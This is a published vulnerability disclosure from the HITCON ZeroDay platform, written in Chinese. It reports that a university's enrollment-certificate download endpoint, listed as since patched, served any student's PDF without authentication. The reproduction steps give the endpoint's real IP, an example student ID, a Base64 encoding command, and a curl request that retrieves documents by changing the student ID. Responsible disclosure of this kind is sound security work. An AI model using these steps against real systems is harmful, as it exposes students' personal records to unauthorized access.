Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2026-00297
- 發信 Vendor: 致理科技大學
- Title: 致理科技大學系統未授權文件存取
- Introduction: 系統未實作任何身份驗證機制,文件內含個人敏感資訊
處理狀態
目前狀態
公開
Last Update : 2026/03/11
-
新提交
-
已審核
-
已通報
-
已修補
-
未複測
-
公開
處理歷程
- 2026/02/25 05:09:05 : 新提交 (由 CH 更新此狀態)
- 2026/03/02 11:03:22 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2026/03/02 17:08:54 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2026/03/02 17:08:54 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2026/03/02 17:08:55 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2026/03/03 16:02:19 : 已修補 (由 組織帳號 更新此狀態)
- 2026/03/11 03:00:17 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2026-00297
- 通報者:haeimch (CH)
- 風險:中
- 類型:邏輯漏洞 (Logic Flaws)
參考資料
攻擊者可經由該漏洞繞過網站邏輯行為進行惡意攻擊。
漏洞說明: OWASP - Testing for business logic
https://www.owasp.org/index.php/Testing_for_business_logic
漏洞說明: CWE-840: Business Logic Errors
https://cwe.mitre.org/data/definitions/840.html
漏洞說明: OWASP - Testing for business logic
https://www.owasp.org/index.php/Testing_for_business_logic
漏洞說明: CWE-840: Business Logic Errors
https://cwe.mitre.org/data/definitions/840.html
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)
相關網址
http://140.131.77.93/SISystem/rgForm/getPdfFile.ashx
敘述
漏洞描述
致理科技大學在學證明下載系統提供學生下載個人在學證明 PDF ,請求網址:
http://140.131.77.93/SISystem/rgForm/getPdfFile.ashx?doc=<Base64字串>其中 doc 參數為 Base64 編碼,解碼後內容:
stdID=11210201&sYT=1141stdID:學生學號sYT:學年度(1141 代表 114 學年度第 1 學期)
重現步驟
-
stdID=<目標學號>&sYT=1141 -
Base64 編碼:
echo -n 'stdID=11210201&sYT=1141' | base64 # 輸出:c3RkSUQ9MTEyMTAyMDEmc1lUPTExNDE= -
無需任何身份驗證即可取得 PDF:
curl -v "http://140.131.77.93/SISystem/rgForm/getPdfFile.ashx?doc=$(echo -n 'stdID=11210201&sYT=1141' | base64)" -
變更
stdID即可下載任意學生的在學證明。
修補建議
身份驗證後才可存取
擷圖
留言討論
登入後留言
聯絡組織
發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。